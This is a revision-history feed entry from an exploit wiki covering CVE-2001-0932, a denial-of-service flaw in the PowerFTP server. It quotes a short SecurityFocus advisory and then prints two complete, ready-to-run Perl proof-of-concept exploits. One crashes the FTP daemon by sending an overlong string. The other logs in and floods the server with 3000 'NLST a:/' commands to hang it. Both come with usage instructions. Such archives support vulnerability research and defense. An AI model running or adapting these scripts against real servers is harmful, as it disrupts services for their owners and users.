https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2001-0932_Cooolsoft_PowerFTP%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9ECVE-2001-0932 Cooolsoft PowerFTP拒絕服務漏洞 - Revision history2026-04-13T18:30:02ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=CVE-2001-0932_Cooolsoft_PowerFTP%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&diff=792&oldid=prevPwnwiki: Created page with "==INFO1== <pre> source: http://www.securityfocus.com/bid/3595/info PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is mainta..."2021-03-31T06:35:56Z<p>Created page with "==INFO1== <pre> source: http://www.securityfocus.com/bid/3595/info PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is mainta..."</p>
<p><b>New page</b></p><div>==INFO1==<br />
<pre><br />
source: http://www.securityfocus.com/bid/3595/info<br />
<br />
<br />
PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.<br />
<br />
Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusally long string of arbitrary characters.<br />
<br />
It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.<br />
<br />
This issue may is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed. <br />
<br />
#!/usr/bin/perl<br />
# Simple script to send a long 'A^s' command to the server, <br />
# resulting in the ftpd crashing<br />
#<br />
# PowerFTP Server v2.03 proof-of-concept exploit<br />
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.<br />
#<br />
# Thanks all the people from Spain and Argentina.<br />
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, <br />
# G.Maggiotti & H.Oliveira.<br />
# <br />
#<br />
# Usage: perl -x PowerFTP_Dos.pl -s <server><br />
#<br />
# Example: <br />
#<br />
# perl -x PowerFTP_Dos.pl -s 10.0.0.1<br />
# 220 Personal FTP Server ready<br />
# Crash was successful !<br />
#<br />
<br />
use Getopt::Std;<br />
use IO::Socket;<br />
<br />
print("\nPowerFTP server v2.03 DoS exploit (c)2001\n");<br />
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");<br />
<br />
getopts('s:', \%args);<br />
if(!defined($args{s})){&usage;}<br />
$serv = $args{s};<br />
$foo = "A"; $number = 2048; <br />
$data .= $foo x $number; $EOL="\015\012";<br />
<br />
$remote = IO::Socket::INET->new(<br />
Proto => "tcp",<br />
PeerAddr => $args{s},<br />
PeerPort => "ftp(21)",<br />
) || die("Unable to connect to ftp port at $args{s}\n");<br />
<br />
$remote->autoflush(1);<br />
print $remote "$data". $EOL;<br />
while (<$remote>){ print }<br />
print("\nCrash was successful !\n");<br />
<br />
<br />
sub usage {die("\nUsage: $0 -s <server>\n\n");}<br />
</pre><br />
<br />
==INFO2==<br />
<pre><br />
source: http://www.securityfocus.com/bid/3595/info<br />
<br />
<br />
PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.<br />
<br />
Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusally long string of arbitrary characters.<br />
<br />
It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.<br />
<br />
This issue may is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed. <br />
<br />
#!/usr/bin/perl<br />
#<br />
# Even though the server will deny access, the slow hardware <br />
# will still hang the machine. This program attempts to <br />
# exploit this weakness by sending the 'NLST a:/' command to <br />
# the server <br />
#<br />
# PowerFTP Server v2.03 proof-of-concept exploit<br />
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.<br />
#<br />
# Thanks all the people from Spain and Argentina.<br />
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,<br />
# G.Maggiotti & H.Oliveira.<br />
# <br />
#<br />
# Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass><br />
#<br />
# Example: <br />
#<br />
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp<br />
# <br />
<br />
use IO::Socket;<br />
<br />
print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");<br />
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");<br />
<br />
#$NUMBER_TO_SEND = 3000; <br />
$BUFF = 3000; <br />
<br />
if ( scalar @ARGV < 4 ) {<br />
print "Usage: $0 <server> <port> <user> <pass>\n";<br />
exit();<br />
}<br />
<br />
<br />
$target = $ARGV[ 0 ];<br />
$port = $ARGV[ 1 ];<br />
$username = $ARGV[ 2 ];<br />
$password = $ARGV[ 3 ];<br />
<br />
print "Creating socket... ";<br />
$sock = new IO::Socket::INET( PeerAddr => $target,<br />
PeerPort => int( $port ), <br />
Proto => 'tcp' );<br />
die "$!" unless $sock;<br />
print "done.\n";<br />
<br />
<br />
read( $sock, $buffer, 1 );<br />
<br />
<br />
print "Sending username...";<br />
print $sock "USER " . $username . "\n";<br />
read( $sock, $buffer, 1 );<br />
print "done.\n";<br />
<br />
<br />
print "Sending password...";<br />
print $sock "PASS " . $password . "\n";<br />
read( $sock, $buffer, 1 );<br />
print "done.\n";<br />
<br />
<br />
print "DoS Attack floppy server...";<br />
for( $i = 0; $i < $BUFF; $i++ ) {<br />
<br />
print $sock "NLST a:/\n"; <br />
read( $sock, $buffer, 1 );<br />
}<br />
<br />
print "done.\n";<br />
<br />
close( $sock );<br />
exit();<br />
</pre></div>Pwnwiki